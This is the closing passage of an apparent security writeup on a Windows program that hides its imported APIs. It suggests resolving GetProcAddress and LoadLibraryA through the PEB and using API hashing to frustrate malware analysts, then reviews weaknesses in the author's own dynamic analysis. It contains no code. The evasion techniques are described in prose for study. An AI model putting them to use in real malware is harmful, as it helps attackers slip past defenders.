For further study, note that two interesting APIs are still in the IAT: GetProcAddress and LoadLibraryA. The addresses of both can be obtained by traversing the PEB, which is outlined in my previous shellcoding in C writeup. Resolving those two APIs that way would hide every API from the IAT. In addition, further obfuscation techniques like API hashing could be leveraged to make it more difficult for malware analysts to understand what APIs or strings are being used throughout this program. API hashing was previously planned for this writeup but will likely be its own writeup due to time constraints.
On the reversing side of things, the dynamic analysis could have been more thorough, for example by watching the decryption take place in memory instead of relying on breakpoints on a specific API (what if it’s resolved some other way and thus never formally “called”?). Rebasing the addresses to match what’s in IDA would also have made it easier to follow the program’s execution flow.